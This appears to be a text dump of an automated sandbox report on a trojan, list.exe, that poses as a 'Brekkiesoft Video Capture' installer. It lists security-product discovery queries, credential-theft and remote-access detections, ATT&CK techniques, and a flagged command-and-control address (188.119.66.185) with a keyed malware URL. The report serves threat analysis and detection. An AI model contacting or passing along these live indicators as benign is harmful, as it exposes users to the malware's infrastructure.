                    Source: svchost.exe, 00000008.00000002.2503604982.0000021190102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                    Source: svchost.exe, 00000008.00000002.2503604982.0000021190102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bsoftvideocapture33.exe PID: 7528, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2503661880.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: bsoftvideocapture33.exe PID: 7528, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,6_2_609660FA
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,6_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,6_2_60963143
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,6_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,6_2_6096923E
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,6_2_6096A38C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,6_2_6096748C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,6_2_609254B1
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,6_2_6094B407
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6090F435 sqlite3_bind_parameter_index,6_2_6090F435
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,6_2_609255D4
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609255FF sqlite3_bind_text,6_2_609255FF
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,6_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,6_2_6094B54C
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,6_2_60925686
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,6_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,6_2_609256E5
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,6_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6092562A sqlite3_bind_blob,6_2_6092562A
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,6_2_60925655
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,6_2_6094C64A
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,6_2_609687A7
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,6_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,6_2_6092570B
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095F772
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,6_2_60925778
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6090577D sqlite3_bind_parameter_name,6_2_6090577D
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,6_2_6094B764
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6090576B sqlite3_bind_parameter_count,6_2_6090576B
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,6_2_6094A894
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095F883
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,6_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,6_2_6096281E
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,6_2_6096583A
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,6_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6094A92B
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6090EAE5 sqlite3_transfer_bindings,6_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,6_2_6095FB98
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,6_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,6_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,6_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,6_2_60966DF1
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,6_2_60969D75
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exeCode function: 6_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,6_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Disable or Modify Tools
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts3
                    Native API
                    15
                    Windows Service
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    3
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook15
                    Windows Service
                    21
                    Software Packing
                    NTDS46
                    System Information Discovery
                    Distributed Component Object ModelInput Capture13
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    DLL Side-Loading
                    LSA Secrets271
                    Security Software Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                    Virtualization/Sandbox Evasion
                    DCSync131
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                    Process Injection
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Bootkit
                    Network Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577465 Sample: list.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 43 time.windows.com 2->43 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for dropped file 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 7 other signatures 2->53 8 list.exe 2 2->8         started        11 svchost.exe 2->11         started        14 svchost.exe 2->14         started        16 4 other processes 2->16 signatures3 process4 file5 37 C:\Users\user\AppData\Local\Temp\...\list.tmp, PE32 8->37 dropped 18 list.tmp 18 25 8->18         started        55 Changes security center settings (notifications, updates, antivirus, firewall) 11->55 21 MpCmdRun.exe 2 11->21         started        signatures6 process7 file8 29 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 18->29 dropped 31 C:\Users\user\AppData\...\unins000.exe (copy), PE32 18->31 dropped 33 C:\Users\user\AppData\Local\...\is-FUIGA.tmp, PE32 18->33 dropped 35 17 other files (9 malicious) 18->35 dropped 23 bsoftvideocapture33.exe 1 19 18->23         started        27 conhost.exe 21->27         started        process9 dnsIp10 45 188.119.66.185, 443, 49795, 49804 FLYNETRU Russian Federation 23->45 39 C:\ProgramData\...\sqlite3.dll, PE32 23->39 dropped 41 C:\...\BrekkiesoftVideoCapture.exe, PE32 23->41 dropped file11

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    list.exe47%ReversingLabsWin32.Trojan.Sockssystemz
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe100%Joe Sandbox ML
                    C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe38%ReversingLabs
                    C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\LTDIS13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe38%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-0G4JQ.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-1B315.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-5FBME.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-A2HQB.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-B9LPS.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-KK3F9.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-P0L8V.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\ltkrn13n.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\is-FUIGA.tmp4%ReversingLabs
                    C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\uninstall\unins000.exe (copy)4%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-LNQIS.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp4%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://188.119.66.185/C0%Avira URL Cloudsafe
                    https://188.119.66.185/.0%Avira URL Cloudsafe
                    https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
                    http://wonderwork.ucoz.com/0%Avira URL Cloudsafe
                    https://188.119.66.185/50%Avira URL Cloudsafe
                    https://188.119.66.185/&Du=0%Avira URL Cloudsafe
                    https://188.119.66.185/J0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a100%Avira URL Cloudmalware
                    http://www.bingmapsportal.com0%Avira URL Cloudsafe
                    https://188.119.66.185/ography0%Avira URL Cloudsafe
                    https://188.119.66.185/MH0%Avira URL Cloudsafe
                    https://188.119.66.185/)0%Avira URL Cloudsafe
                    https://188.119.66.185/h50%Avira URL Cloudsafe
                    https://188.119.66.185/N/0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e3008889325100%Avira URL Cloudmalware
                    https://188.119.66.185/v0%Avira URL Cloudsafe
                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=0%Avira URL Cloudsafe
                    https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=0%Avira URL Cloudsafe
                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    time.windows.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      https://188.119.66.185/ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308afalse
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000003.00000002.1376138773.000001769B268000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUlist.exefalse
                              high
                              https://188.119.66.185/bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000003.00000003.1375649172.000001769B257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376099978.000001769B258000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000003.00000003.1375390941.000001769B26E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375470188.000001769B262000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1375597565.000001769B25A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376152284.000001769B270000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376125413.000001769B263000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://188.119.66.185/5bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000003.00000002.1376048855.000001769B22B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://188.119.66.185/priseCertificatesbsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000003.00000003.1375634961.000001769B241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1376073516.000001769B242000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://188.119.66.185/.bsoftvideocapture33.exe, 00000006.00000002.2504737283.000000000336F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://188.119.66.185/en-USbsoftvideocapture33.exe, 00000006.00000002.2501360979.0000000000961000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://188.119.66.185/rosoftbsoftvideocapture33.exe, 00000006.00000002.2504737283.0000000003358000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                http://wonderwork.ucoz.com/list.tmp, 00000002.00000002.2504041070.0000000005AEE000.00000004.00001000.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000000.1278473609.00000000004D4000.00000002.00000001.01000000.0000000A.sdmp, BrekkiesoftVideoCapture.exe.6.dr, bsoftvideocapture33.exe.2.dr, is-7DT4P.tmp.2.drfalse
